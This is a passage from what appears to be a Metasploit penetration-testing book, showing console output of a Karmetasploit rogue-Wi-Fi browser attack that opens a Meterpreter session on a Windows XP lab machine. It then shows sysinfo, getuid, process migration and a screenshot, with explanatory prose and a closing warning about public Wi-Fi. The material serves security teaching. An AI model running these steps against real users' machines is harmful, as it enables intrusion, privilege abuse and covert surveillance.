184
Chapter 12
[*] Sending EXE payload to 10.0.0.100:1371...
[*] Sending stage (748032 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)
In this output, you can see at that Metasploit first lets the client know
that various popular websites are in fact located on the attacking machine.
Then, at , it uses JavaScript to determine the target’s operating system and
browser, and responds at with exploits based on that fingerprint. At the
client is presented with a malicious ActiveX control, resulting in the familiar
yellow prompt bar in Internet Explorer, shown at the top of Figure 12-1. You
can also see buried in the output at that an exploit was launched against
the client. After a brief period, you see at that the exploit was successful
and a Meterpreter session has been opened on the target PC!
Returning to
msfconsole
, we can interact with the session that was created
and check to see what permissions we have obtained on the target. Remember,
when you exploit a browser it’s always a good idea to migrate your process
out of the web browser in case it gets closed.
meterpreter >
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
sysinfo
Computer: V-XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter >
getuid
Server username: V-XP-SP2-BARE\Administrator
meterpreter >
run migrate -f
[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2232
[*] New server process: notepad.exe (2232)
meterpreter >
screenshot
Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg
meterpreter >
Because this is a default installation of Windows XP SP2 with the very inse-
cure Internet Explorer 6 installed (both of which are highly out of date), the
client didn’t even need to accept and install the malicious ActiveX control.
Wrapping Up
Attacks against wireless networks have been a popular topic for quite some
time. Although this attack can take a bit of setup, imagine its success against a
number of similarly configured clients located in a high-traffic or public area.
This approach to attacking wireless clients is often popular because it’s easier
than a brute force attack against a well-secured wireless infrastructure.
Now that you’ve seen how easy it is to conduct this sort of attack, you’ll
probably think twice about using public wireless networks. Are you sure that
the coffee shop is offering “free public Wi-Fi”? Or perhaps someone is run-
ning Karmetasploit?